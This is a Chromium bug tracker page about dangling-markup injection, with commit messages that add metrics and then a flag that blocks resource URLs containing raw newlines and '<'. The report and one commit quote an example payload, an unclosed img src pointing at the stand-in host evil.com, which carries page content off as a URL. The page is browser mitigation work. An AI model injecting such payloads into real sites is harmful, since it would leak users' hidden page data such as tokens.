Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Issue 680970 `<img src='` eats the page until the next `'`.
Starred by 7 users Project Member Reported by mkwst@chromium.org, Jan 13 Back to list
Status: Assigned
Owner:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 3
Type: Bug

Blocking:
issue 680969
issue 695474



Sign in to add a comment
Because HTML is fairly lax in parsing attribute values, injecting something like `<img src='https://evil.com/?whatever=` can expose otherwise hidden values by eating up elements and their attributes, and resolving them as a URL.

Perhaps we could restrict the character set allowed in `src`/`href` attributes to bring them in-line with CSS's rules for `url('`. That is, perhaps we should stop resolving URLs that contain newline characters? Or braces? Or both? It's not clear whether we can do something about this by default, but worst case, we could allow an opt-in to stricter parsing.

Metrics first, then a proposal to HTML folks.
 
(Unescaped newlines or braces, that is. Something like `%0A` is fine, whereas `\n` is indicative of a dangling `'`)
Project Member Comment 2 by bugdroid1@chromium.org, Jan 14
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/63ec3598c662f32715148c25faf99771c9d1cb6c

commit 63ec3598c662f32715148c25faf99771c9d1cb6c
Author: mkwst <mkwst@chromium.org>
Date: Sat Jan 14 06:12:45 2017

Measure URL resolution with raw newlines and braces.

Because HTML is fairly lax in parsing attribute values, injecting
something like `<img src='https://evil.com/?whatever=` can expose
otherwise hidden values by eating up elements and their attributes, and
resolving them as a URL.

Perhaps we could restrict the character set allowed in `src`/`href`
attributes to bring them in-line with CSS's rules for `url('`. That
is, perhaps we should stop resolving URLs that contain raw newline
characters (`\n`)? Or braces (`<`)? Or both? It's not clear whether we
can do something about this by default, so let's add metrics and see
what we see.

BUG=680970
R=jochen@chromium.org

Review-Url: https://codereview.chromium.org/2629393002
Cr-Commit-Position: refs/heads/master@{#443793}

[modify] https://crrev.com/63ec3598c662f32715148c25faf99771c9d1cb6c/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/63ec3598c662f32715148c25faf99771c9d1cb6c/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/63ec3598c662f32715148c25faf99771c9d1cb6c/tools/metrics/histograms/histograms.xml

Newlines (ignoring leading/trailing only) in src/href in httparchive:

SELECT * FROM (
SELECT page, url, REGEXP_EXTRACT(LOWER(body), r'(<[a-z][^>]+\s+(?:src|href)\s*=\s*(?:"\s*(?:[^"\s]+\s*(?:\r|\n)+\s*[^"\s]+)+\s*"|\'\s*(?:[^\'\s]+\s*(?:\r|\n)+\s*[^\'\s]+)+\s*\')[^>]+>)') AS match
FROM [httparchive:har.2017_01_01_chrome_requests_bodies]
)
WHERE page = url
AND match != "null"
AND NOT REGEXP_MATCH(match, r'["\']\s*\+') # exclude JS string concats


1771 results. https://gist.github.com/zcorpan/aef7b5628010c988b0fa505e9f4ca468

Of those, 26 also have a <. https://gist.github.com/zcorpan/d3a143d7267f441eed3bedea4424f594

(Didn't query for only <.)
Wow. That's a regex. Thank you! :)

Visually inspecting the `\n` + `<` results at https://gist.github.com/zcorpan/d3a143d7267f441eed3bedea4424f594 is encouraging. There's a good deal of commented-out code that's caught up in the regex. http://www.nikonisti.ro/ looks like a typo that wouldn't work in the status-quo either, as does http://www.receive-smsonline.com/ and http://www.cyclenews.com/.

Let's see what the use counter looks like. The current patch up at https://codereview.chromium.org/2634893003 should give us a reasonable estimate of how often we'd actually end up blocking a resource load because of both a raw newline and less-than. I'm hopeful that it's not a large number. :)
Project Member Comment 5 by bugdroid1@chromium.org, Jan 17
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/cd87dfc6f638a6d64b2311d35a58cb1969116915

commit cd87dfc6f638a6d64b2311d35a58cb1969116915
Author: mkwst <mkwst@chromium.org>
Date: Tue Jan 17 13:42:25 2017

Experiment with blocking resolution of HTTP URLs containing '\n' and '<'.

Following up on the metrics added in https://codereview.chromium.org/2629393002,
this patch adds a flag that will prevent URL resolution if the URL string
contains a raw newline and less than sign. It also refines the metrics by
excluding non-HTTP (e.g. `data:`, `javascript:`, `file:`) URLs, as those are quite
likely to contain `<`, and quite unlikely to result in exfiltration (as they don't
hit the network).

Let's see how the data looks.

Intent to Implement: https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/rOs6YRyBEpw/D3pzVwGJAgAJ

BUG=680970

Review-Url: https://codereview.chromium.org/2634893003
Cr-Commit-Position: refs/heads/master@{#444040}

[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/resources/helper.js
[add] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute.html
[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/Source/platform/RuntimeEnabledFeatures.in
[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/tools/metrics/histograms/histograms.xml

I noticed now the [^>]+ should have been [^>]*, but for `img` at least it shouldn't make any difference most of the time...
Project Member Comment 7 by bugdroid1@chromium.org, Jan 19
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/41318f4888c1f60613c74cc86e539d173b16b0ad

commit 41318f4888c1f60613c74cc86e539d173b16b0ad
Author: mkwst <mkwst@chromium.org>
Date: Thu Jan 19 15:11:50 2017

Reduce the perf overhead of our dangling markup experiments.

Given that Document::completeURL is a hotspot, this patch revamps the
approach to capture removed whitespace up in //url (where we're already
scanning through the string), and limits the scan for '<' to cases in
which we've actually removed whitespace.

BUG=680970, 682300
R=jochen@chromium.org

Review-Url: https://codereview.chromium.org/2643613002
Cr-Commit-Position: refs/heads/master@{#444734}

[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/third_party/WebKit/Source/platform/weborigin/KURL.h
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/third_party/WebKit/Source/platform/weborigin/KURLTest.cpp
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/tools/metrics/histograms/histograms.xml
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/url/third_party/mozilla/url_parse.cc
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/url/third_party/mozilla/url_parse.h
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/url/url_util.cc

Blocking: 695474
Project Member Comment 9 by bugdroid1@chromium.org, Apr 7
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/58eb768aa18cf83d0ac4b30d339ee1a778ee582a

commit 58eb768aa18cf83d0ac4b30d339ee1a778ee582a
Author: mkwst <mkwst@chromium.org>
Date: Fri Apr 07 18:29:09 2017

Experimentally block/deprecate resource requests whose URLs contain raw newlines.

Intent to Deprecate: https://groups.google.com/a/chromium.org/d/msg/blink-dev/AqSrOMzwrlk/wUglQnTJCgAJ

BUG=680970

Review-Url: https://codereview.chromium.org/2794303002
Cr-Commit-Position: refs/heads/master@{#462933}

[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/bindings/blink-in-js-asan-crash-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/compositing/iframes/iframe-in-composited-layer-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/editing/pasteboard/dragstart-contains-default-content-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/canvas/canvas-composite-canvas-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/canvas/canvas-composite-image-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/css/counters/counter-traverse-table-cell-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/dom/Element/offsetLeft-offsetTop-body-quirk-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/dom/Element/offsetLeft-offsetTop-html-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/events/constructors/track-event-constructor-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/events/drag-and-drop-autoscroll-inner-frame-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/events/resize-subframe-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/events/touch/gesture/long-press-focuses-frame-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/files/null-origin-string-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/frames/content-opacity-1-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/frames/negative-remaining-length-crash-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/loader/simultaneous-reloads-assert-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/loader/stateobjects/pushstate-in-data-url-denied-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-hidden-iframe-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-hidden-iframe-zero-size-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-nested-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-no-focusable-content-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-no-scrollable-content-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-recursive-offset-parent-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-with-offscreen-focusable-element-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fullscreen/full-screen-iframe-without-allow-attribute-allowed-from-parent-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/local/absolute-url-strip-whitespace-expected.txt
[add] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute.html
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/document-all-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/no-indexeddb-from-sandbox-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/no-popup-from-sandbox-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/no-popup-from-sandbox-top-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-can-navigate-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-is-sandboxed-control-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-is-sandboxed-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-when-allowed-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/sandboxed-opener-can-close-window-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/window-named-proto-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/window-named-valueOf-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/xmlhttprequest/access-control-basic-allow-access-control-origin-header-data-url-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/xmlhttprequest/newline-in-request-uri-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/android/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/linux/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/linux/fast/text/selection-hard-linebreak-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/linux/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/linux/virtual/disable-spinvalidation/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/mac/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/win/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/win/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/win/virtual/disable-spinvalidation/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/plugins/createScriptableObject-before-start-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/printing/subframes-percentage-height-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/svg/custom/g-outside-svg-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/svg/custom/large-image-pattern-crash-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/core/frame/Deprecation.cpp
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/core/loader/FrameFetchContext.cpp
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/platform/RuntimeEnabledFeatures.json5
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/tools/metrics/histograms/histograms.xml
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/url/gurl_unittest.cc
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/url/third_party/mozilla/url_parse.cc

Project Member Comment 10 by bugdroid1@chromium.org, May 18
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/c9d6c1bb4234256176f66cc8c61c9878c931950a

commit c9d6c1bb4234256176f66cc8c61c9878c931950a
Author: mkwst <mkwst@chromium.org>
Date: Thu May 18 15:05:22 2017

Set 'whitespace_removed' correctly when resolving relative URLs.

The previous two (!!!) patches missed the relative URL resolution path
through KURL and url_utils. This patch pokes at the logic one more time.

BUG=680970

Review-Url: https://codereview.chromium.org/2890143002
Cr-Commit-Position: refs/heads/master@{#472812}

[modify] https://crrev.com/c9d6c1bb4234256176f66cc8c61c9878c931950a/third_party/WebKit/LayoutTests/fast/loader/url-strip-cr-lf-tab-expected.txt
[modify] https://crrev.com/c9d6c1bb4234256176f66cc8c61c9878c931950a/third_party/WebKit/Source/platform/weborigin/KURLTest.cpp
[modify] https://crrev.com/c9d6c1bb4234256176f66cc8c61c9878c931950a/url/url_canon_relative.cc
[modify] https://crrev.com/c9d6c1bb4234256176f66cc8c61c9878c931950a/url/url_util_unittest.cc

Project Member Comment 11 by bugdroid1@chromium.org, May 24
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/9e5ae901660de47ef1b844c6113eae91b5ae8e9e

commit 9e5ae901660de47ef1b844c6113eae91b5ae8e9e
Author: Mike West <mkwst@google.com>
Date: Wed May 24 17:43:18 2017

Update dangling markup mitigations.

Still behind a flag, just updating the checks to look for both `\n` and
`<` rather than just the former. This is in line with the patches up at
https://github.com/whatwg/url/pull/284 and
https://github.com/whatwg/fetch/pull/519.

Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ.

Bug: 680970
Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840
Reviewed-on: https://chromium-review.googlesource.com/514024
Commit-Queue: Mike West <mkwst@chromium.org>
Reviewed-by: Jochen Eisinger <jochen@chromium.org>
Cr-Commit-Position: refs/heads/master@{#474341}
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/FlagExpectations/enable-blink-features=LayoutNG
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/bindings/blink-in-js-asan-crash-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/compositing/iframes/iframe-in-composited-layer-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/editing/pasteboard/dragstart-contains-default-content-expected.txt
[add] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/external/wpt/fetch/dangling-markup-mitigation.tentative.html
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/canvas/canvas-composite-canvas-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/canvas/canvas-composite-image-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/css/counters/counter-traverse-table-cell-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/dom/Element/offsetLeft-offsetTop-body-quirk-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/dom/Element/offsetLeft-offsetTop-html-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/events/constructors/track-event-constructor-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/events/drag-and-drop-autoscroll-inner-frame-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/events/resize-subframe-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/events/touch/gesture/long-press-focuses-frame-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/files/null-origin-string-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/frames/content-opacity-1-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/frames/negative-remaining-length-crash-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/loader/simultaneous-reloads-assert-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/loader/stateobjects/pushstate-in-data-url-denied-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/loader/url-strip-cr-lf-tab-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-hidden-iframe-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-hidden-iframe-zero-size-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-nested-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-no-focusable-content-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-no-scrollable-content-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-recursive-offset-parent-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-with-offscreen-focusable-element-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fullscreen/full-screen-iframe-without-allow-attribute-allowed-from-parent-expected.txt
[delete] https://crrev.com/373106c8b302f73d26b4e971b4c0fe1d3fdeeb41/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute-expected.txt
[delete] https://crrev.com/373106c8b302f73d26b4e971b4c0fe1d3fdeeb41/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute.html
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/document-all-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/no-indexeddb-from-sandbox-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/no-popup-from-sandbox-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/no-popup-from-sandbox-top-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-can-navigate-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-is-sandboxed-control-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-is-sandboxed-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-when-allowed-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/sandboxed-opener-can-close-window-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/window-named-proto-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/window-named-valueOf-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/xmlhttprequest/access-control-basic-allow-access-control-origin-header-data-url-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/xmlhttprequest/newline-in-request-uri-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/linux/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/linux/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/linux/virtual/disable-spinvalidation/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/mac/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/win/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/win/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/win/virtual/disable-spinvalidation/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/plugins/createScriptableObject-before-start-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/printing/subframes-percentage-height-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/svg/custom/g-outside-svg-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/svg/custom/large-image-pattern-crash-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/core/loader/BaseFetchContext.cpp
